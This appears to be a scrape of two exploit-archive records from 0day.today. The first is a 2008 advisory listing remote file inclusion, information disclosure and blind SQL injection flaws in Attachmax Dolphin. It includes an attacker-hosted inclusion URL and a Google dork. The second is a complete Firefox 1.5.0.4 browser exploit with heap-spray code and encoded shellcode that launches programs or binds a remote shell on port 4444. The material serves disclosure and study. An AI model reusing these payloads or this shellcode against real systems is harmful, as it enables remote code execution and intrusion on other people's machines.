Attachmax Dolphin <= 2.1.0 Multiple Remote Vulnerabilities

{"type": "zdt", "lastseen": "2016-04-19T01:40:55", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "Attachmax Dolphin <= 2.1.0 Multiple Remote Vulnerabilities", "published": "2008-09-16T00:00:00", "href": "http://0day.today/exploit/description/3677", "cvss": {"vector": "NONE", "score": 0.0}, "description": "Exploit for unknown platform in category web applications", "hash": "9645f0dcb9ab2e42334d4b7e3f5c58f43801a9cb5aff72df0a34668942ec0bc6", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "==========================================================\r\nAttachmax Dolphin <= 2.1.0 Multiple Remote Vulnerabilities\r\n==========================================================\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------\r\n[ECHO_ADV_101$2008] Attachmax Dolphin <= 2.1.0 Multiple Vulnerability\r\n-----------------------------------------------------------------------------------------\r\n\r\nAuthor : K-159\r\nDate : September, 16 th 2008\r\nLocation : Jakarta, Indonesia\r\nCritical Lvl : High\r\nImpact : System access\r\nWhere : From Remote\r\n---------------------------------------------------------------------------\r\n\r\nAffected software description:\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nApplication : Attachmax Dolphin\r\nversion : <= 2.1.0\r\nVendor : http://www.attachmax.com/\r\nDescription :\r\n\r\nAttachmax allows you to run your very own youtube Video Community site, just like popular Videos sites\r\nsuch as youtube, dailymotion and revver. Additionally Attachmax includes the ability for Images and Files,\r\nfollowing the trend of other popular File Sharing communities such as Imageshack and Rapidshare. \r\nSo not only do you get a fully functional Video Script, but a complete File Sharing Website.\r\n\r\n---------------------------------------------------------------------------\r\n\r\nVulnerability:\r\n~~~~~~~~~~~~~\r\n\r\n1. Remote File Inclusion Vulnerability\r\n\r\nInput passed to the \"rel_path\" parameter in config.php page is not properly verified before being used \r\nto include files.This can be exploited to include arbitrary files from local or external resources.\r\nSuccessful exploitation requires that \"register_globals\" is enabled.\r\n\r\n\r\nPoc/Exploit:\r\n~~~~~~~~~\r\nhttp://www.example.com/[path]/config.php?rel_path=http://www.attacker.com/evil?\r\n\r\n\r\n2. File info disclosure Vulnerability\r\n\r\nFile info.php in main folder not protected to see directly from browser and could allow an attacker \r\nto obtain sensitive information from the server.\r\n\r\nPoc:\r\n~~~\r\nhttp://www.example.com/[path]/info.php\r\n\r\n\r\n3. Blind SQL Injection Vulnerability.\r\n\r\nInput passed to the \"category\" parameter in search.php page is not properly verified before being used \r\nin an sql query.\r\nThis can be exploited thru the browser to manipulate SQL queries and pull the username and password\r\nfrom users in plain text.\r\n\r\nPoc/Exploit:\r\n~~~~~~~~~~~\r\nhttp://www.example.com/[path]/index.php?page=Search&category=[BlindSQL]\r\n\r\n\r\n\r\nDork:\r\n~~~~\r\nGoogle : \"2007 Attachmax\" or inurl:\"controller.php?page=profile\"\r\n\r\n\r\nSolution:\r\n~~~~~~\r\n\r\n- Edit the source code to ensure that input is properly verified.\r\n- Turn off register_globals in php.ini\r\n- Rename info.php.\r\n\r\nTimeline:\r\n~~~~~~~~\r\n\r\n- 24 - 08 - 2008 bug found\r\n- 02 - 09 - 2008 vendor contacted\r\n- 16 - 09 - 2008 advisory released\r\n---------------------------------------------------------------------------\r\n\r\nShoutz:\r\n~~~~\r\n~ \"Happy 5th Anniversary\" for ECHO.\r\n~ ping - my dearest wife, zautha - my beloved son, and my beloved next children.\r\n~ \"Happy Wedding\" for (y3dips,the_day,Negatif),moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,\r\nthe_hydra,neng chika, str0ke\r\n~ SK,pokleyzz,Abond,an0maly,cybertank, super_temon, b120t0,inggar,fachri,adi,rahmat,indra\r\n~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,cyb3rh3b\r\n~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,\r\nkuntua, stev_manado,nofry,k1tk4t,0pt1c\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "id": "1337DAY-ID-3677", "sourceHref": "http://0day.today/exploit/3677", "modified": "2008-09-16T00:00:00", "reporter": "K-159"}

{"result": {"zdt": [{"lastseen": "2016-04-19T02:21:07", "references": [], "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "reporter": "H D Moore", "published": "2006-07-28T00:00:00", "type": "zdt", "title": "Mozilla Firefox <= 1.5.0.4 Javascript Navigator Object Code Execution PoC ", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-07-28T00:00:00", "href": "http://0day.today/exploit/description/8733", "id": "1337DAY-ID-8733", "sourceData": "=========================================================================\r\nMozilla Firefox <= 1.5.0.4 Javascript Navigator Object Code Execution PoC\r\n=========================================================================\r\n\r\n\r\n\r\n<html><body><script>\r\n\r\n// MoBB Demonstration\r\nfunction Demo() {\r\n\r\n\t// Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html\r\n\t// https://bugzilla.mozilla.org/show_bug.cgi?id=342267\r\n\t// CVE-2006-3677\r\n\r\n\t// The Java plugin is required for this to work\r\n\r\n\t// win32 = calc.exe\r\n\tvar shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');\r\n\tvar fill_win32 = unescape('%u0800');\r\n\tvar addr_win32 = 0x08000800;\r\n\t\r\n\t// linux = touch /tmp/METASPLOIT (unreliable)\r\n\tvar shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080');\r\n\tvar fill_linux = unescape('%ua8a8');\r\n\tvar addr_linux = -0x58000000; // Integer wrap: 0xa8000000\r\n\r\n\t// mac os x ppc = bind a shell to 4444\r\n\tvar shellcode_macppc = unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u3800%u0061%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u4800%u000d%u0002%u115c%u0000%u0000%u7c88%u02a6%u38a0%u0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u0278%u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278%u7fc3%uf378%u3800%u001e%u3880%u0010%u9081%uffe8%u38a1%uffe8%u3881%ufff0%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4%u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%uffff%u4082%uffe5%u3800%u0042%u4400%u0002%u7c00%u0278%u7ca5%u2a79%u4082%ufffd%u7c68%u02a6%u3863%u0028%u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b%u7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f62%u696e%u2f63%u7368%u0000%u0000');\r\n\tvar fill_macppc = unescape('%u0c0c');\r\n\tvar addr_macppc = 0x0c000000;\r\n\t\r\n\t// mac os x intel = bind a shell to 4444\r\n\t// Thanks to nemo[at]felinemenace.org for shellcode\r\n\t// Thanks to Todd Manning for the target information and testing\r\n\tvar shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd');\r\n\tvar fill_macx86 = unescape('%u1c1c');\r\n\tvar addr_macx86 = 0x1c000000;\t\t\r\n\r\n\r\n\t// Start the browser detection\r\n\tvar shellcode;\r\n\tvar addr;\r\n\tvar fill;\r\n\tvar ua = '' + navigator.userAgent;\r\n\r\n\tif (ua.indexOf('Linux') != -1) {\r\n\t\talert('Trying to create /tmp/METASPLOIT');\r\n\t\tshellcode = shellcode_linux;\r\n\t\taddr = addr_linux;\r\n\t\tfill = fill_linux;\r\n\t}\r\n\t\r\n\tif (ua.indexOf('Windows') != -1) {\r\n\t\talert('Trying to launch Calculator');\t\r\n\t\tshellcode = shellcode_win32;\r\n\t\taddr = addr_win32;\r\n\t\tfill = fill_win32;\r\n\t}\t\r\n\r\n\tif (ua.indexOf('PPC Mac OS') != -1) {\r\n\t\talert('Trying to bind a shell to 4444');\r\n\t\tshellcode = shellcode_macppc;\r\n\t\taddr = addr_macppc;\r\n\t\tfill = fill_macppc;\r\n\t}\t\r\n\t\r\n\tif (ua.indexOf('Intel Mac OS') != -1) {\r\n\t\talert('Trying to bind a shell to 4444');\r\n\t\tshellcode = shellcode_macx86;\r\n\t\taddr = addr_macx86;\r\n\t\tfill = fill_macx86;\r\n\t}\r\n\t\t\t\r\n\tif (! shellcode) {\r\n\t\talert('OS not supported, only attempting a crash!');\r\n\t\tshellcode = unescape('%ucccc');\r\n\t\tfill = unescape('%ucccc');\r\n\t\taddr = 0x02020202;\r\n\t}\r\n\t\t\r\n\tvar b = fill;\r\n\twhile (b.length <= 0x400000) b+=b;\r\n\r\n\tvar c = new Array();\r\n\tfor (var i =0; i<36; i++) {\r\n\t\tc[i] = \r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode +\r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode + \r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode + \r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode;\r\n\t}\r\n\t\t\t\r\n\t\r\n\tif (window.navigator.javaEnabled) {\r\n\t\twindow.navigator = (addr / 2);\r\n\t\ttry {\r\n\t\t\tjava.lang.reflect.Runtime.newInstance(\r\n\t\t\t\tjava.lang.Class.forName(\"java.lang.Runtime\"), 0\r\n\t\t\t);\r\n\t\t\talert('Patched!');\r\n\t\t}catch(e){\r\n\t\t\talert('No Java plugin installed!');\r\n\t\t}\r\n\t}\r\n}\r\n\r\n</script>\r\n\r\nClicking the button below may crash your browser!<br><br>\r\n<input type='button' onClick='Demo()' value='Start Demo!'>\r\n\r\n\r\n</body></html>\r\n\r\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/8733", "hash": "0683eccac242f077cc9da42613b48d33696fd4dd701f4a6981168e08c79a94d3"}]}}